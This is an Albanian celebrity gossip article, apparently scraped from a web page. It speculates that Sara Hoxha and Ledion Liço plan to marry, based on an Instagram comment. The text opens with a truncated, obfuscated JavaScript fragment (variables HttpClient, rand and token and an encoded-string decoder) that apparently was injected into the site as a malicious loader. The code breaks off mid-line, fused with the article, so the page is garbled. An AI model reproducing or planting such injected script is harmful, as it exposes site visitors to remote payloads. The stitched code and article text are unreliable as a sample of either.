;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Edhe një dyshe e famshme drejt martesës? (FOTO)

By

Që të dy janë të famshëm, njëri falë televizionit e tjetra falë pasurisë që trashëgoi nga babai.

Ka kohë që janë në lidhje, por nuk u përmend ndonjëherë martesa mes tyre, por ndoshta ka ardhur koha që “i-jave” t’iu vihen pikat.

Fjala është për dyshen e famshme Sara Hoxha dhe Ledion Liço.

Ndonëse prej ditësh përflitet që çifti i njohur do “t’i japë fund” beqarisë së shpejti, në fakt dyshimet janë përforcuar edhe më shumë mesditën e së shtunës në komentin e lënë nga 21-vjeçarja Sara Hoxha në profilin e së motrës- Lori, në Instagram.

Që prej mesdite fashionistja e njohur shqiptare, njëkohësisht njëra prej trashëgimtareve të Top Media-s, Lori Hoxha, po publikon një seri fotosh të shkrepura mbrëmjen e djeshme gjatë një ceremonie martesore.

Lori ka ndarë kështu me mijëra ndjekësit e saj në rrjetin social  pasionin e saj për kërcimin e veçanërisht atë për vallet tradicionale shqiptare. Por ai që ka rënë menjëherë në sy në mesin e shumë komplimentave ka qenë komenti i Sarës, e cila ndërsa qesh me diçiturën e së motrës shkruan:

“Do më nderosh”. Mos ndoshta Sara e ka fjalën që e motra do e nderojë duke kërcyer në dasmën e saj?!

Megjithatë duhet thënë se dyshimet vazhdojnë të mbeten ende në kuadrin e aludimeve përsa kohë që çifti Sara dhe Ledion Liço ende nuk ka publikuar asgjë lidhur më këtë event të rëndësishëm të jetës së tyre, shkruan Bordo.al.

Artikuj të ngjashëm